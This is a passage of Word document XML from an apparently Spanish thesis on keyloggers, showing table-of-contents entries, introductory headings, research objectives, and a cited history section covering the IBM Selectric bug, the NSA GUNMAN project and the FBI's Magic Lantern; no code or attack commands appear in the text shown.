        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810116 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>116</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="660"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810117" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>18.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Referencias</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810117 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>118</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810118" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Índice de Ilustraciones</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810118 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>122</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810119" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Índice de tablas</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810119 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>125</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810120" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Anexos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810120 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>126</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810121" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Código fuente del keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810121 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>126</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810122" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Código fuente del fichero de configuración</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810122 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>135</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810123" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Código fuente del monitor</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810123 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>136</w:t>
        </w:r>
        <w:r>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p>
    <w:p w:rsidR="00B029AB" w:rsidRDefault="00231F20" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc18453489"/>
      <w:bookmarkStart w:id="19" w:name="_Toc19810039"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Introducción</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="003228E0" w:rsidRPr="00D77544" w:rsidRDefault="003228E0" w:rsidP="003228E0">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc18453490"/>
      <w:bookmarkStart w:id="21" w:name="_Toc19810040"/>
      <w:r w:rsidRPr="00D77544">
        <w:t>Contexto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>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3D097A15" wp14:editId="2F9D5CB5">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2" w:name="_Toc19358140"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Dos modelos de keylogger hardware. Para teclado ps/2 y USB.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>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3" w:name="__RefHeading___Toc863_3518492859"/>
      <w:bookmarkStart w:id="24" w:name="_Toc18453491"/>
      <w:bookmarkStart w:id="25" w:name="_Toc19810041"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Definición básica de KEYLOGGER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>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6" w:name="_Toc19810042"/>
      <w:r>
        <w:t>Clasificación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>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9810043"/>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Default="00231F20">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E9A">
        <w:t>Investigar las técnicas de ocultación o evasión que utilizan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE28B6" w:rsidRPr="00853E9A" w:rsidRDefault="00FE28B6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Realizar un análisis mediante ingeniería inversa (reversing) a un keylogger de malware.</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421702483"/>
      <w:bookmarkStart w:id="33" w:name="__RefHeading___Toc1092_228935268"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19810044"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Historia y Estado del Arte</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="001147B3" w:rsidRDefault="001147B3" w:rsidP="001147B3">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc19810045"/>
      <w:r>
        <w:t>Un poco de historia</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00FE38A0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FE38A0">
            <w:instrText xml:space="preserve"> CITATION Kei17 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FE38A0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A26721">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A26721">
            <w:instrText xml:space="preserve"> CITATION Cry \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A26721">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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42FA66DE" wp14:editId="1B4927B2">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9358141"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. IBM Selectric II (1971-1981)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0040329E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003B2BC8">
            <w:instrText xml:space="preserve">CITATION Cen12 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="0040329E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="0040329E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1972428017"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="004212DB">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004212DB">
            <w:instrText xml:space="preserve"> CITATION Sha07 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="004212DB">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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9"/>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6084915B" wp14:editId="58C94B04">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7" w:name="_Toc19358142"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SE</w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve">Q Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Portada del documento de la NSA, “The GUNMAN Project”.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Desclasificado en Diciembre de 2011</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>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3D4FB511" wp14:editId="35E21422">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8" w:name="_Toc19358143"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Bola “pelota de golf” de la IBM Selectric, con los caracteres.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00860C04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00860C04">
            <w:instrText xml:space="preserve"> CITATION Per \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00860C04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r w:rsidR="00860C04">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D80DF0">
        <w:t>que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lo publicó</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2042507629"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00860C04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005D1C44">
            <w:instrText xml:space="preserve">CITATION The \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00860C04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F83923">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F83923">
            <w:instrText xml:space="preserve"> CITATION Lah16 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F83923">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="00F83923">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2078935708"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F83923">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F83923">
            <w:instrText xml:space="preserve"> CITATION Nat13 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F83923">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00AE30ED">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AE30ED">
            <w:instrText xml:space="preserve"> CITATION Bob01 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AE30ED">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r w:rsidR="00AE30ED">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> que el FBI estaba desarrollando un software llamado “Magic Lantern”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="625819625"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A54014">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A54014">
            <w:instrText xml:space="preserve"> CITATION Chr02 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A54014">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00030FF6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00030FF6">
            <w:instrText xml:space="preserve"> CITATION Jen11 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00030FF6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000532E2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000532E2">
            <w:instrText xml:space="preserve"> CITATION Bos03 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="000532E2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="004A6E46">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004A6E46">
            <w:instrText xml:space="preserve"> CITATION The06 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="004A6E46">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="004F31A6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004F31A6">
            <w:instrText xml:space="preserve"> CITATION CHI05 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="004F31A6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="004F31A6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1255896959"/>
          <w:citation/>
